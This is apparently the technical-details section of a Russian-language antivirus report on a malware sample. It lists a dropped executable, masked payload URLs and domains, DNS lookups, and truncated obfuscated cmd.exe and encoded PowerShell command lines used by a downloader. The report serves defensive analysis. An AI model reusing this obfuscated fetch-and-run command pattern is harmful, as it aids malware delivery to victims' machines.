Техническая информация
- '<SYSTEM32>\cmd.exe' uZufWjBqzdEjK wMCWVOXOVEkhVndfKLu TbrszZOaZ & %C^om^S^pEc% %C^om^S^pEc% /V /c set %aQWVtlRhiPiFjtd%=vBVMKKITb&&set %var1%=p&&set %var2%=ow&&set %YzFaPoZZl...
- C:\users\public\20208.exe
- C:\users\public\20208.exe
- 'bl##.dintex.in':80
- 'hy####balance.at':80
- 'jo####anhaehn.com':80
- 'ed##omp.ru':80
- http://www.hy####balance.at/lehLGqV/
- http://jo####anhaehn.com/iPD0/
- http://ed##omp.ru/HBmmyF/
- DNS ASK bl##.dintex.in
- DNS ASK hy####balance.at
- DNS ASK jo####anhaehn.com
- DNS ASK sa##r.ru
- DNS ASK ed##omp.ru
- '<SYSTEM32>\cmd.exe' uZufWjBqzdEjK wMCWVOXOVEkhVndfKLu TbrszZOaZ & %C^om^S^pEc% %C^om^S^pEc% /V /c set %aQWVtlRhiPiFjtd%=vBVMKKITb&&set %var1%=p&&set %var2%=ow&&set %YzFaPoZZl...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " (NEW-obJeCt ManageMENt.auTOmAtIOn.PscREDEnTIal ' ',( '76492d1116743f0423413b16050a5345MgB8AGsAeABrAHUALwB0AFMANwBaADEAMgA3AGcAaQAwADgAcQArAGQAcQB2AEEAPQA9AHwAZQAwADcAOQA2ADYAMwBiADUANgA1ADgA...